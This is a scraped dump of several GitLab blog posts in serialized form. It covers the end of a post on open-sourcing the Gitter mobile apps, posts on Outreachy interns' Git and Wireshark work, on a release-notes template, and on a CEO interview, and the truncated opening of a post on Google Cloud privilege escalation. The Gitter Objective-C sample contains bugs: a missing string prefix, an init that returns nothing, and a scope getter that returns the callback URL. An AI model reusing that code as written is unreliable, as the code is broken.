You can track [this issue for shared macOS GitLab CI runners](https://gitlab.com/gitlab-com/gl-infra/infrastructure/issues/5720).\n\n`Gitter/GitterSecrets-Dev.plist`\n\n```xml\n\u003C?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\u003C!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n\u003Cplist version=\"1.0\">\n\u003Cdict>\n  \u003C!--\n  Visit https://developer.gitter.im/apps (sign in) and create a new app\n  Name: my-gitter-ios-app (can be anything)\n  Redirect URL: https://gitter.im/login/oauth/callback\n  -->\n  \u003Ckey>OAuthClientId\u003C/key>\n  \u003Cstring>\u003C/string>\n  \u003Ckey>OAuthClientSecret\u003C/key>\n  \u003Cstring>\u003C/string>\n  \u003Ckey>OAuthCallback\u003C/key>\n  \u003Cstring>https://gitter.im/login/oauth/callback\u003C/string>\n\u003C/dict>\n\u003C/plist>\n```\n\n[`troupeobjccommon`](https://gitlab.com/gitlab-org/gitter/troupeobjccommon) is in Objective-C\n\n`TRAppSettings.h`\n\n```h\n#import \u003CFoundation/Foundation.h>\n\n@interface TRAppSettings : NSObject\n\n+ (TRAppSettings *) sharedInstance;\n\n- (NSString *) clientID;\n\n- (NSString *) clientSecret;\n\n- (NSString *) oauthScope;\n\n@end\n```\n\n`TRAppSettings.m`\n\n```objc\n@interface TRAppSettings ()\n\n@property (strong, nonatomic) NSUserDefaults *secrets;\n\n@end\n\nstatic TRAppSettings *sharedAppSettingsSingleton;\n\n@implementation TRAppSettings {\n    int firstRunPostUpdate;\n}\n\n+ (void)initialize\n{\n    static BOOL initialized = NO;\n    if(!initialized)\n    {\n        initialized = YES;\n        sharedAppSettingsSingleton = [[TRAppSettings alloc] init];\n    }\n\n    NSLog(@\"Pulling secrets from SECRETS_PLIST = %@.plist\", SECRETS_PLIST);\n}\n\n+ (TRAppSettings *) sharedInstance\n{\n    return sharedAppSettingsSingleton;\n}\n\n- (id)init {\n    NSString *troupeSecretsPath = [[NSBundle mainBundle] pathForResource:\"GitterSecrets-Dev\" ofType:@\"plist\"];\n    if(troupeSecretsPath == nil) {\n        NSString 
*failureReason = [NSString stringWithFormat:@\"Gitter secrets file not found in bundle: %@.plist. You probably need to add it to the `Gitter/Supporting Files` in Xcode navigator\", SECRETS_PLIST];\n        NSException* exception = [NSException\n            exceptionWithName:@\"FileNotFoundException\"\n            reason:failureReason\n            userInfo:nil];\n\n        NSLog(@\"%@\", failureReason);\n\n        [exception raise];\n    }\n    NSDictionary *troupeSecrets = [NSDictionary dictionaryWithContentsOfFile:troupeSecretsPath];\n\n    self.secrets = [NSUserDefaults standardUserDefaults];\n    [self.secrets registerDefaults:troupeSecrets];\n}\n\n- (NSString *) clientID {\n    return [self.secrets stringForKey:@\"OAuthClientId\"];\n}\n\n- (NSString *) clientSecret {\n    return [self.secrets stringForKey:@\"OAuthClientSecret\"];\n}\n\n- (NSString *)oauthScope {\n    return [self.secrets stringForKey:@\"OAuthCallback\"];\n}\n```\n\nUsage in the Swift app:\n\n```swift\nprivate let appSettings = TRAppSettings.sharedInstance()\n\nappSettings!.clientID()\nappSettings!.clientSecret()\nappSettings!.oauthScope()\n```\n\n### Adding in GitLab CI\n\nIf you're interested in setting up automated builds and publish releases to the Apple App Store from GitLab CI, you can learn how [blog post about using fastlane](/blog/ios-publishing-with-gitlab-and-fastlane/).\n\n### Removing secrets from the repo history\n\nWe didn't have a complete picture of what to remove because `truffleHog` didn't work well, so we didn't use BFG Repo-Cleaner. To remove secrets from the git repo history, we just squashed all of the history into a single commit.\n\n## Life after open sourcing apps\n\nWe have some [thoughts of deprecating the Android/iOS apps](https://gitlab.com/gitlab-org/gitter/webapp/issues/2281) but the community has been great to keep the apps alive so far. 
We released a couple versions of each app including [dark theme](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/2) and [GitLab sign-in](https://gitlab.com/gitlab-org/gitter/gitter-android-app/merge_requests/112) for Android and a bunch of technical debt and fixes for iOS, including removing the deprecated [`SlackTextViewController`](https://gitlab.com/gitlab-org/gitter/gitter-ios-app/merge_requests/8) (and we are intensely working on incorporating the new [`SlackWysiwygInputController`](https://goo.gl/7NDM3x) 😜).\n\nThe [Android](https://gitlab.com/gitlab-org/gitter/gitter-android-app)/[iOS](https://gitlab.com/gitlab-org/gitter/gitter-ios-app) apps could benefit from a lot of polish and fixes, so if you see anything particularly annoying, we would love to review and merge your updates!\n\nCover image by [Nate Johnston](https://unsplash.com/@natejohnston) on [Unsplash](https://unsplash.com/photos/DkCydKeaLV8).\n{: .note}\n",[9,779,708,109],{"slug":4317,"featured":6,"template":689},"open-sourcing-the-gitter-mobile-apps","content:en-us:blog:open-sourcing-the-gitter-mobile-apps.yml","Open Sourcing The Gitter Mobile Apps","en-us/blog/open-sourcing-the-gitter-mobile-apps.yml","en-us/blog/open-sourcing-the-gitter-mobile-apps",{"_path":4323,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4324,"content":4329,"config":4336,"_id":4338,"_type":14,"title":4339,"_source":16,"_file":4340,"_stem":4341,"_extension":19},"/en-us/blog/outreachy-sponsorship-winter-2020",{"title":4325,"description":4326,"ogTitle":4325,"ogDescription":4326,"noIndex":6,"ogImage":3320,"ogUrl":4327,"ogSiteName":673,"ogType":674,"canonicalUrls":4327,"schema":4328},"Technology internships meet open source in Outreachy","Inside Outreachy technology internships, where participants work on Git.","https://about.gitlab.com/blog/outreachy-sponsorship-winter-2020","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        
\"headline\": \"Technology internships meet open source in Outreachy\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Joey Salazar\"},{\"@type\":\"Person\",\"name\":\"Charvi Mendiratta\"},{\"@type\":\"Person\",\"name\":\"Nuritzi Sanchez\"},{\"@type\":\"Person\",\"name\":\"Christian Couder\"}],\n        \"datePublished\": \"2021-04-15\",\n      }",{"title":4325,"description":4326,"authors":4330,"heroImage":3320,"date":4333,"body":4334,"category":10,"tags":4335},[4331,4332,2773,1492],"Joey Salazar","Charvi Mendiratta","2021-04-15","\n\nAs an enthusiastic participant in the [open source](/blog/innersourcing-using-the-open-source-workflow-to-improve-collaboration-within-an-organization/) community, we were excited to participate in the [Outreachy technology internships program](https://www.outreachy.org/) again this year, which focuses on women and underrepresented groups. It's a way GitLab can give back, and as a bonus, Outreachy's principles intersect with [our Diversity, Inclusion and Belonging value](https://handbook.gitlab.com/handbook/values/#diversity-inclusion).\n\n## About the Outreachy program\n\nInitially, Outreachy began as the Open Source Program for Women (OPW) at [GNOME](https://www.gnome.org/about-us/). The program was successful and grew quickly. Today, Outreachy has grown into the largest global technology internships program that provides opportunities for women and underrepresented groups to work on open source projects.\n\nCurrently, Outreachy is independently organized with the help of many volunteers, or sponsored help. For example, [Cindy Pallares](/company/team/#cindy) is a GitLab employee and helps with organizing Outreachy as a site reliability engineer.\n\nOutreachy is a paid technology internship program that runs twice a year for three months. During that time, interns can work in areas like programming, user experience, documentation, illustration and graphic design, or data science. 
In this technology internship program, participants work remotely with experienced mentors from prominent FOSS communities like Git, Mozilla, Linux kernel, GNOME, Wikimedia, and many others.\n\nOne of the benefits of the Outreachy technology internship is that the interns do not need to be students. It's a great opportunity for people who are coming back into the workforce after a hiatus, or who are navigating a career change into tech. This technology internship program is unique because it incorporates skill sets beyond engineering – which creates a broader range of skill sets represented in the open source world. The Outreachy internship is remote, making it more relevant than ever during the pandemic by helping interns gain experience working on an all-remote team.\n\nGitLab is one of the organizations that sponsors the Outreachy technology internship program, and we hope that by sharing our experience we can encourage more tech organizations to join us in participating in Outreachy as [corporate sponsors](https://www.outreachy.org/sponsor/).\n\n## Outreachy interns work on Git\n\nMore than 90% of the professional applications created today are built using open source components, according to a [2020 Tidelift survey](https://cdn2.hubspot.net/hubfs/4008838/Resources/The-Tidelift-guide-to-managed-open-source.pdf?utm_source=hs_automation&utm_medium=email&utm_content=66640714). One of the fundamental open source technologies we leverage at GitLab is the [Git project](https://git-scm.com/), so we chose to sponsor an Outreachy intern to work there.\n\n> GitLab sponsors an Outreachy intern to work on one of the most critical open source technologies that it relies on: The Git project.\n\n[Christian Couder](/company/team/#chriscool), senior backend software engineer at GitLab, who works on Git full-time, introduced the [GitLab Developer Relations team](/handbook/marketing/developer-relations/) to the Outreachy opportunity during the winter of 2017-2018 round. 
An experienced mentor for other programs like Google Summer of Code, Christian thought that it would be great to mentor an intern through the Outreachy program as well. Since the number of mentored interns and the need to sponsor them increased over the years, GitLab has sponsored an Outreachy intern for the Git project since winter 2019-2020.\n\nOutreachy at Git works similarly to the [Google Summer of Code (GSoC) program](https://summerofcode.withgoogle.com/). Git participates in GSoC in the summer and Outreachy in the winter. These programs consist of the Git project finding mentors and project ideas for individual participants to work on. Then there is a selection step, which includes working on a micro-project (a small code-related change), as part of the application process, and writing a proposal for a project to work on during the internship. After the interns are announced, they begin to work on their projects. Typically, Git tries to provide two mentors per intern to provide the best possible experience for the mentee.\n\n> The mentors used to be long-time Git developers, but more and more Outreachy and GSoC alumni have returned to the program as mentors, indicating the power of these programs.\n\nThe mentors volunteer some time each week to help their mentees by answering questions, providing suggestions, reviewing contributions, etc. Contributions still have to be sent by participants to the Git mailing list as patches. Then, other experienced Git contributors review the contributions before they are integrated into the Git code base by [Junio Hamano](https://www.linkedin.com/in/gitster), the Git maintainer.\n\n## Meet the Outreachy interns\n\nWe met with the Outreachy interns at Git to learn more about their experience participating in the winter 2020-2021 Outreachy technology internship program. 
In the next section, the Outreachy interns shared what the experience was like, in their own words.\n\n### Charvi Mendiratta: A self-taught programmer with an interest in robotics\n\n_This section was written by Charvi._\n\n> I am a recent graduate from the electronics field in India, a self-taught programmer with internship experiences working on mobile robotics projects, and I aim to pursue a career as a software developer. - [Charvi](https://charvi-077.github.io/about/)\n\nIt turned out to be difficult to find a job as a software developer because of my background in electronics and because I lacked professional programming skills. Also, there are very few job opportunities for recent graduates in software engineering roles, especially those related to robotics.\n\nDue to these challenges, I decided to try out open source in parallel with brushing up my skills. I supposed that open source contributions would be the best way to get hands-on experience with projects that required real-life problem solving skills, and I wanted to learn to convert my code into deployable software. That's why I decided to apply to the Outreachy program.\n\nBesides wanting to learn more about creating enterprise-grade code, I have always been interested in being part of the open source community. I first learned about open source work culture from my college programming community. I remember the old days when I attended an open source event called '[Software Freedom Day](http://www.softwarefreedomday.in/)' at my university. That's where I first learned about different open source programs like Outreachy.\n\n> Over the course of my three month internship, I worked on cleaning up and improving the Git interactive rebase, which is a useful git command to rewrite or modify the commit history. 
- Charvi\n\n#### About Charvi's Outreachy project\n\nMy work on Git's interactive rebase, which was mentored by Christian and [Phillip Wood](https://git.github.io/rev_news/2019/11/20/edition-57/), will help users who want to rework their commits and make it easier for users to improve the quality of their contributions. When teams practice code review, for example, it's very useful to rework commits to make them better or easier to understand before a reviewer steps in, and to fix them when reviews point to problems.\n\nFirst, I added the options '-c' and '-C' to the present `fixup` command in the interactive rebase. The `fixup` command adds the functionality to edit the commit message of the specific commit listed in the interactive rebase (see [merged patches](https://lore.kernel.org/git/20210129182050.26143-1-charvi077@gmail.com/)). This work is based on the [original patch series](https://github.com/phillipwood/git/commits/wip/rebase-amend), started by Phillip.\n\nThen, I worked on the [follow-up patches](https://lore.kernel.org/git/20210210113650.19715-1-charvi077@gmail.com/) and introduced some improvements after discussing the user interface of the added options with the Git community. Next, I worked on adding the new feature to `git commit --fixup` that allows to prepare the \"amend!\" and \"reword!\" commit, as an alternative to the present `fixup!` commit. It works with `git commit --autosquash` and will help to fix-up the content and commit message of the specific commit from the command line (see [merged patches](https://lore.kernel.org/git/20210315075435.18229-1-charvi077@gmail.com/)).\n\n### Joey Salazar: An engineer with international experience\n\n_This section was written by Joey._\n\n> As a female engineer from Costa Rica, who graduated in China through a full scholarship, it has been a challenge to find opportunities with mentoring for my transition from IT into programming. 
- [Joey](https://about.me/gomezsalazar-jogebeth)\n\nEven though I worked five years in IT (OS, networking, and storage), and was certified in Linux+ and CCNA through self-learning before beginning my software engineering studies, most companies and organizations seem eager to hire mid-senior level developers. Very few seem willing to invest in helping people get to that level, or in finding ways to build on any preexisting IT experience. As an open source advocate, it was through my research of open source technologies and the open source space that I came across community groups such as [WomenWhoCode](https://www.womenwhocode.com/), which was where I learned about Outreachy.\n\n#### About Joey's Outreachy project\n\n> My favorite thing to work on, probably because of my [background in privacy advocacy](https://www.techdirt.com/articles/20200622/08142044757/long-past-time-to-encrypt-entire-dns.shtml), was adding the foundations of HTTPS connection support for the Git protocol by following up on [a patch](https://gitlab.com/wireshark/wireshark/-/merge_requests/1946) started (and shared by) long-time Wireshark developer, [Richard Sharpe](https://sharkfestus.wireshark.org/bios/richard-sharpe). –  Joey\n\nMy work on Git protocol support in [Wireshark](https://www.wireshark.org/), which was mentored by Git developers employed by Google, [Emily Shaffer](https://nasamuffin.dev) and Jonathan Nieder, will help users debugging Git or any Git using software (like GitLab). This work helps production teams or developers understand what's going on between Git clients and servers, so they can better troubleshoot or optimize how Git works. This project will help demystify Git and its inner workings in the tech community.\n\nAs Wireshark is \"the world’s foremost and widely-used network protocol analyzer\", improving the way it dissects and presents the Git protocol to the user is helpful and important. 
Traffic interception and analysis is part of many user's workflows – from students, to researchers and advocates. For a few years, Git's dissector in Wireshark was bare-bones, and supported only raw traffic transmitted over regular TCP transport – my work is helping to change that.\n\nBy starting with [base functionality](https://gitlab.com/wireshark/wireshark/-/merge_requests/1922) and building on top of other member's work, Joey and her mentors added parsing of the multiplexing ([sideband](https://gitlab.com/wireshark/wireshark/-/merge_requests/1313)) version in use (if any) to Wireshark's dissector for the Git protocol. Next, they [added parsing for the specific version](https://gitlab.com/wireshark/wireshark/-/merge_requests/1714) of the Git protocol that is used, following up on [an MR to parse the Git protocol version](https://gitlab.com/wireshark/wireshark/-/merge_requests/805), did some refactoring on [an MR to refactor Git packet line dissector](https://gitlab.com/wireshark/wireshark/-/merge_requests/1942), and began the foundations for Git protocol's [testing suite](https://gitlab.com/wireshark/wireshark/-/merge_requests/2142).\n\nToday the Git dissector now includes more functionality and error handling, as well as HTTPS transport support – all of which was done through GitLab's platform.\n\n## Outreachy mentor shares experience\n\n_Christian, the Outreachy mentor and GitLab team member who worked with Joey and Charvi, shares what the experience was like in his own words._\n\nThere are many rewarding parts to being a mentor. I really enjoy seeing mentees gain confidence over the weeks in their abilities to contribute significantly by themselves.\n\n> Since Git is used by more than 80% of the developers in the world, I hope that the Outreachy interns get the feeling that they can improve things even in small ways for millions of people and that their work can have a global impact. 
- Christian\n\nI also really enjoy it when former mentees want to continue contributing to the Git community after their internship. Outreachy alumni contributions can take many forms. Sometimes they continue to contribute on the same topic as their project, sometimes they participate in related discussions, even 10 years later. One of our mentees was recently hired to work full-time on Git. And it is of course great when they want to become mentors, so they can give back to the program and increase the number of people who can get mentored.\n\nIt's great too that Outreachy, Google, and sometimes the Git project itself all provide funds for former mentees to come to in-person Git events or open source-related conferences. Meeting mentees in-person is very rewarding. At in-person events, the interns can also meet a number of Git-related companies and people, and of course, learn even more about Git and open source. For some of them, it was the first time they traveled outside of their country or could visit a different continent.\n\n#### Mentorship comes with challenges\n\nThe most challenging part of being a mentor is the fact that the Git codebase is getting bigger and more complex as Git evolves and gains features all the time.\n\nThis makes it hard for participants to stay on track when the internship starts. They sometimes have to trust that following the process we suggest will lead them to better and better understanding until they can find their own way and become autonomous.\n\n## Outreach interns share their key takeaways\n\nWe asked Joey and Charvi to share some of the ways that the Outreachy technology internship has impacted them.\n\n### Joey has a better understanding of herself\n\n_This section was written by Joey._\n\n> My Outreachy internship helped me better define the type of team and community that I'd like to join and which will benefit the most from the wide range of skills that I can offer. 
– Joey\n\nOutreachy was an amazing help, not only in technical areas, but also with soft skills. For example, I formed a solid understanding of Git. Now I can use `git cherry-pick` and `git rebase`, as well as squash, comfortably since I understand better what they do, and how. Those Git commands gave me lots of trouble when I was a junior developer for [BIND](https://en.wikipedia.org/wiki/BIND), and now they don't give me trouble anymore. I also reinforced fundamentals in C -- implementing pointers and references without panic and knowing about vtables -- and I learned how to write test cases in Python.\n\nA crowning achievement was finding balance between patience and impatience, and between autonomy and guidance.\n\n### Charvi has fallen in love with the open source world\n\n_This section was written by Charvi._\n\n> Outreachy helped me start my open source journey. - Charvi\n\nI have always been fascinated with the open source work culture as a way to learn, share, and grow. I finally got wonderful working experience too, since both Outreachy and the Git project are prestigious organizations.\n\nI learned a lot throughout the entire internship, starting from when the Outreachy contribution period began before I qualified for the internship. On the technical side, I enhanced my C programming and debugging skills, learned to write neat code, learned about shell scripts, and developed a deeper understanding of Git commands and about the Git project workflow.\n\nApart from this, my internship helped me improve my communication skills, make connections with amazing software developers, and  become more confident in myself. I am sincerely thankful for the Outreachy program, Git community, and my mentors, Christian and Phillip. It was an amazing learning journey.\n\n## So what's next?\n\nNow that the Outreachy internship has concluded, both Joey and Charvi are ready to leverage their skills and experience working on the Git project to future work in FOSS. 
Learn more about [Charvi's experience](https://charvi-077.github.io/about/) and [Joey's experience](https://about.me/gomezsalazar-jogebeth) by following the links.\n\n## GitLab's continued internship opportunities\n\nGitLab is proud to have sponsored and mentored an intern for the Git project during the most recent round of Outreachy technology internships. We hope to someday qualify for our own Outreachy interns to work on the [GitLab FOSS project](https://gitlab.com/gitlab-org/gitlab-foss) (which celebrates 10 years in October 2021).\n\nThis summer, GitLab will also be participating for the first time in [Google Summer of Code 2021](https://summerofcode.withgoogle.com/organizations/4961424868114432/). We look forward to mentoring engineering students through that technology internship program.\n\nIn addition to participating in these two great technology internship programs, GitLab held its first [engineering internship program](/handbook/engineering/internships/) in 2020 with great success. 
As a result, GitLab will continue to hire interns for various projects and teams in an ongoing fashion, with a specific [focus on recruiting interns from underrepresented groups in engineering](/handbook/engineering/internships/#recruitment).\n\nWe look forward to supporting these programs that help foster diversity in open source and the wider tech industry, and are excited for the year ahead!\n",[9,751,4141],{"slug":4337,"featured":6,"template":689},"outreachy-sponsorship-winter-2020","content:en-us:blog:outreachy-sponsorship-winter-2020.yml","Outreachy Sponsorship Winter 2020","en-us/blog/outreachy-sponsorship-winter-2020.yml","en-us/blog/outreachy-sponsorship-winter-2020",{"_path":4343,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4344,"content":4350,"config":4355,"_id":4357,"_type":14,"title":4358,"_source":16,"_file":4359,"_stem":4360,"_extension":19},"/en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes",{"title":4345,"description":4346,"ogTitle":4345,"ogDescription":4346,"noIndex":6,"ogImage":4347,"ogUrl":4348,"ogSiteName":673,"ogType":674,"canonicalUrls":4348,"schema":4349},"Pair GitLab and The Good Docs Project template to improve release notes","Creating compelling, detailed, human-readable notes for software releases is important. 
Using GitLab and this template from The Good Docs Project makes it easier.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099541/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_432673748_5xWPNsktdz2QChWhl16jGq_1750099540656.jpg","https://about.gitlab.com/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Pair GitLab and The Good Docs Project template to improve release notes\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Aaron Peters, Member, Good Docs Project\"}],\n        \"datePublished\": \"2024-01-23\",\n      }",{"title":4345,"description":4346,"authors":4351,"heroImage":4347,"date":4352,"body":4353,"category":10,"tags":4354},[1659],"2024-01-23","Release notes allow software users to quickly understand the changes that come with the latest version of software. They also allow software publishers to highlight changes as important, or provide crucial information about the impact an upgrade may have. Some tools allow developers to \"generate\" release notes based on sources of data (such as completed items in DevOps systems), but notes produced this way tend to simply list changes without context. Writing release notes, however, provides teams with the opportunity to \"tell the story\" of the changes the new software version will bring.\n\nThough this process certainly requires a greater investment of time than publishing a basic changelog does, your users will certainly appreciate the results: release notes that explain the key elements of the release (such as new features, improvements, and known issues) in a well-organized, human-readable way.\n\n[The Good Docs Project's](https://thegooddocsproject.dev/welcome/) release notes template is designed to help you do exactly that. 
And the combination of GitLab's work management platform and our own [Release Notes template](https://gitlab.com/tgdp/templates/-/tree/main/release-notes?ref_type=heads) makes the job of putting out good, informative release notes easier.\n\n## The anatomy of quality release notes\n\nRelease notes that provide readers with a good picture of the version's changes require two primary inputs:\n\n- **A list of the changes included in the release**\n  At The Good Docs Project, all the management of the work of our contributors occurs in GitLab. So it's easy to refer to our release plans to identify which additions and improvements were completed and included in the release.\n- **A description of those changes including reasoning, importance, and impact**\n  This is where our project's Release Notes template can assist. Rather than staring at a blank page, wondering where to start, users can begin to fill in our template step-by-step, adjusting to taste.\n\nWe'll walk through each of these steps in the following sections as they occurred when creating the release notes to [our recent Dragon release](https://gitlab.com/tgdp/templates/-/releases/v1.1.0).\n\n## Gathering a release's changes\n\nAt The Good Docs Project, we use GitLab features — including setting milestones, creating/assigning issues, and tagging releases — to get our work out into the community (our prior blog post here at GitLab describes this process). The platform allows our worldwide contributor base to easily discover new things to work on and update everyone on their progress once they select something. 
When the time comes to package a release, it brings the added benefit of a tidy list of issues included in the project at the time of release.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176084/Blog/hxo08y06apkumwuwm80c.png\" alt=\"The Milestone screen in GitLab provides an easy-to-scan list of work included in the release\" width=\"100%\" height=\"auto\">\n\nWhen creating the release notes for our project's Dragon milestone, we reviewed all the items included in the **Closed** column on the Milestone screen. This allowed us to pick the most important changes to highlight, while leaving out issues that wouldn't significantly impact a user's experience.\n\n## Crafting the release notes\n\nEquipped with a list of all the key updates in the release, we start writing the release notes. Our project's [Release Notes template](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/template-release-notes.md?ref_type=heads) provides a ready-made Markdown skeleton comprised of key sections based on our contributors' research and experience. The accompanying [usage guide](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/guide-release-notes.md?ref_type=heads) and [example of the template in action](https://gitlab.com/tgdp/templates/-/blob/main/release-notes/example-release-notes.md?ref_type=heads) provides additional tips and suggestions for writing effective release notes. The latter references our **Chronologue** project, a fictional telescope and application that can see through time, which is naturally well-documented.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176091/Blog/jcpfxjqb5jpidssm3jlr.png\" alt=\"The Release Notes template comes ready to populate with 'the story' of your latest release\" width=\"100%\" height=\"auto\">\n\nOf course, our template is simply a starting point. 
Teams should always feel free to add sections where they make sense, remove them where they don't, and make the style of it their own. For example, we left out the **Bug fixes** and **Known issues** sections in our latest Dragon release notes, instead focusing on the new additions and improvements this release brought.\n\n## Adding release notes to the release\n\nGitLab's build tools also make it easy to add our notes while actually creating the release. First, we tagged one of our project's commits, then created a release from the tag. On GitLab's **Releases > New** screen, we can copy and paste the Markdown we wrote to automatically format the release notes.\n\n\u003Cimg src=\"https://res.cloudinary.com/about-gitlab-com/image/upload/v1752176096/Blog/otwduhvokgnqclon4ugx.png\" alt=\"Our templates are already in Markdown format, so when it's time to paste them into the release it works automagically!\" width=\"100%\" height=\"auto\">\n\nAnd just like that our release notes are done. With the assistance of the template, they required just an hour to write. And after an additional half-hour of work creating the release, we're ready to send our work out to the community. Our experience using the combination of GitLab and our templates has made the process of shipping our templates a piece of cake.\n\nIf you'd like to check out our templates, feel free to browse [our GitLab project](https://gitlab.com/tgdp).\nOr visit our [community page](https://thegooddocsproject.dev/community/) to learn how to join us in leveling up the state of technical documentation.\n\n*The [GitLab Open Source Partners](https://go.gitlab.com/030Ue3) are building the future of open source on GitLab. 
[Connect with them](https://gitlab.com/gitlab-com/marketing/developer-relations/open-source-program/gitlab-open-source-partners) on Gitlab.com.*\n",[9,482,267,752],{"slug":4356,"featured":91,"template":689},"pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes","content:en-us:blog:pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes.yml","Pair Gitlab And The Good Docs Project Template To Improve Release Notes","en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes.yml","en-us/blog/pair-gitlab-and-the-good-docs-project-template-to-improve-release-notes",{"_path":4362,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4363,"content":4369,"config":4375,"_id":4377,"_type":14,"title":4378,"_source":16,"_file":4379,"_stem":4380,"_extension":19},"/en-us/blog/pick-your-brain-interview-jake-stein",{"title":4364,"description":4365,"ogTitle":4364,"ogDescription":4365,"noIndex":6,"ogImage":4366,"ogUrl":4367,"ogSiteName":673,"ogType":674,"canonicalUrls":4367,"schema":4368},"Open source lessons learned: My interview with GitLab’s CEO","Stitch CEO and co-founder Jake Stein sits down for a pick your brain meeting with GitLab CEO Sid Sijbrandij.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680388/Blog/Hero%20Images/pyb-jake-stein.jpg","https://about.gitlab.com/blog/pick-your-brain-interview-jake-stein","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Open source lessons learned: My interview with GitLab’s CEO\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jake Stein\"}],\n        \"datePublished\": \"2017-08-18\",\n      }",{"title":4364,"description":4365,"authors":4370,"heroImage":4366,"date":4372,"body":4373,"category":10,"tags":4374},[4371],"Jake Stein","2017-08-18","\n_GitLab CEO Sid Sijbrandij occasionally sits down for a \"[pick your 
brain](/handbook/eba/ceo-scheduling/#pick-your-brain-meetings)\"\nmeeting with people seeking advice on open source, remote work, or discussion of other things related to GitLab._\n\nWhen we launched Singer, our [open source ETL project](https://www.singer.io/) at [Stitch](https://www.stitchdata.com/), I was looking for advice on the best strategies to make it successful. August Capital is an investor in both Stitch and GitLab, and they were kind enough to introduce me to Sid Sijbrandij, CEO of GitLab. Sid was very generous with his time, and he shared some of his lessons learned about open source.  \n\n\u003C!-- more -->\n\n## GitLab’s unique approach\n\nAs I explained Stitch to Sid, he asked a few follow up questions, and then shared information about a plan to build up the GitLab analytics stack. I didn’t set up the call intending to sell, but before it was over, he had added us to the publicly accessible page listing the tools that their team plans to evaluate. Their transparency is very impressive, and it eliminates the friction that can slow down a traditional company.\n\n## Open source adoption\n\nVirtually all of GitLab’s paying customers have come from their open source user base. While GitLab has a large sales team, they are primarily focused on converting users to the paid products rather than getting new GitLab users.  \n\nOver 100,000 organizations use GitLab, and their product and engineering teams are responsible for growing that number. One of most important drivers of that growth has been improving the first run experience and time to value.  \n\nWe already had plans to improve the Singer user experience, but Sid encouraged me to take it a step further. The most common use case for Singer, and ETL in general, is pulling data into a database and then visualizing the data. 
He recommended that we bundle Singer with a PostgreSQL database and an open source visualization tool like Metabase into a easy-to-use package, potentially in a Docker container, which will allow users to get to their end goal much faster.\n\nThis was a really interesting idea that had not occurred to our team before. It motivated us to start thinking more holistically about the goals of our open source users, and I’m confident that this will help us grow adoption of Singer.  \n\n## Open source business model\n\nGitLab started as a free, open source tool and later introduced an enterprise edition and the free SaaS version of GitLab.com. Several years later, in April of 2017, they introduced paid tiers on GitLab.com.\n\nWe’ve taken a very different path with Stitch. We launched with a freemium SaaS service, and subsequently added an enterprise edition of the SaaS product and the free, open source Singer project.  \n\nI thought that the differences in GitLab’s path might have been due to a philosophical decision about business model sequence, but it was much more practical. GitLab started as an open source project, and a business was created around it only after the project had significant traction. In the early days of the business, on-premises was where all of the usage was, so that’s where they started to charge. The original SaaS product was free so it could get traction and build a network effect. As the SaaS product got better, and as the cost of hosting the ever-growing number of SaaS users increased, they launched paid tiers.  \n\nWhile Stitch and GitLab had very different beginnings, our business models have evolved in a similar direction. It was great to get the benefit of the lessons that Sid has learned as we chart our own course.  \n\n## About the Guest Author\n\nJake Stein is the co-founder and CEO of Stitch. Prior to Stitch, Stein was co-founder and COO at RJMetrics, a business intelligence software company that was acquired by Magento in 2016. 
Before founding RJMetrics, Jake worked at Insight Venture Partners, a software-focused venture capital and private equity firm. He graduated from the Wharton School at the University of Pennsylvania with high honors and concentrations in Finance and Entrepreneurship.\n",[845,9],{"slug":4376,"featured":6,"template":689},"pick-your-brain-interview-jake-stein","content:en-us:blog:pick-your-brain-interview-jake-stein.yml","Pick Your Brain Interview Jake Stein","en-us/blog/pick-your-brain-interview-jake-stein.yml","en-us/blog/pick-your-brain-interview-jake-stein",{"_path":4382,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4383,"content":4389,"config":4395,"_id":4397,"_type":14,"title":4398,"_source":16,"_file":4399,"_stem":4400,"_extension":19},"/en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform",{"title":4384,"description":4385,"ogTitle":4384,"ogDescription":4385,"noIndex":6,"ogImage":4386,"ogUrl":4387,"ogSiteName":673,"ogType":674,"canonicalUrls":4387,"schema":4388},"Google Cloud privilege escalation & post-exploitation tactics","A Red Team exercise on exploiting design decisions on GCP.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749672755/Blog/Hero%20Images/white-lightning-heating-mountain.jpg","https://about.gitlab.com/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Chris Moberly\"}],\n        \"datePublished\": \"2020-02-12\",\n      }",{"title":4390,"description":4385,"authors":4391,"heroImage":4386,"date":4392,"body":4393,"category":865,"tags":4394},"Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments",[2541],"2020-02-12","\n## Update\n\n_At GitLab we have an 
